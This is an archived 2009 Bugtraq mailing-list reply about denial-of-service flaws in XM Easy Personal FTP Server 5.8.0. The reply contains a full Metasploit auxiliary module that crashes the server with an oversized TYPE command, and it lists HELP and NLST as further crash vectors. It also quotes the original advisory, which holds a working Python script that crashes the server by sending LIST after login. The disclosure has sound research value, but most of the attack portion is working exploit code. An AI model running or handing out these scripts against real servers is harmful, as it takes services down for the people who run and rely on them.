OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

From: Protek Research Lab (protekresearchlabyahoo.ca)
Date: Tue Nov 10 2009 - 15:37:54 CST

Hi, It's seem to have much more bugs then what you listed in your advisory. It's possible to DoS the server with this 3 others commands; HELP ('A' * 90000) NLST ('A' * 90000) TYPE ('A' * 90000) Here is an auxiliary module for metasploit... require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS', 'Description' => %q{ You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call Type. }, 'Author' => 'Francis Provencher, Protek Research Lab', 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'References' => [ [ 'URL', ' http://protekresearch.blogspot.com] ], 'DisclosureDate' => '2009/11/10') ) # They're required register_options([ OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]), OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ]) ]) end def run return unless connect_login raw_send_recv("TYPE #{'A' * 90000}\r\n") disconnect print_status("OK, server may still be technically listening, but it won't respond") end end have a nice Day! --- On Tue, 11/10/09, zhangmcmail.ustc.edu.cn <zhangmcmail.ustc.edu.cn> wrote: > From: zhangmcmail.ustc.edu.cn <zhangmcmail.ustc.edu.cn> > Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability > To: bugtraqsecurityfocus.com > Received: Tuesday, November 10, 2009, 3:07 AM > Date of Discovery: 10-Nov-2009 > > Credits:zhangmc[at]mail.ustc.edu.cn > > Vendor: Dxmsoft > > Affected: > XM Easy Personal FTP Server 5.8.0 > Earlier versions may also be affected > > Overview: > XM Easy Personal FTP Server is a easy use FTP server > Application. Denial of service vulnerability exists in XM > Personal FTP Server that causes the application to crash > when the "LIST" is sent to FTP server if you do not use > "PASV" or "POST" first. > > Details: > XM Easy Personal FTP Server can't handle "LIST" command if > you do not use "PASV" or "POST" first.If you have logged on > the server successfully,a "LIST" command will lead the ftp > server to crash. > > Severity: > High > > Exploit example: > #!/usr/bin/python > import socket > import sys > > def Usage(): >     print ("Usage:  ./expl.py > <serv_ip>      <Username> > <password>\n") >     print ("Example:./expl.py 192.168.48.183 > anonymous anonymous\n") > if len(sys.argv) <> 4: >         Usage() >         sys.exit(1) > else: >     hostname=sys.argv[1] >     username=sys.argv[2] >     passwd=sys.argv[3] >     sock = socket.socket(socket.AF_INET, > socket.SOCK_STREAM) >     try: >         sock.connect((hostname, 21)) >     except: >         print ("Connection error!") >         sys.exit(1) >     r=sock.recv(1024) >     sock.send("user %s\r\n" %username) >     r=sock.recv(1024) >     sock.send("pass %s\r\n" %passwd) >     r=sock.recv(1024) >     sock.send("LIST\r\n") >     sock.close() >     sys.exit(0); > > > __________________________________________________________________ The new Internet Explorer® 8 - Faster, safer, easier. Optimized for Yahoo! Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/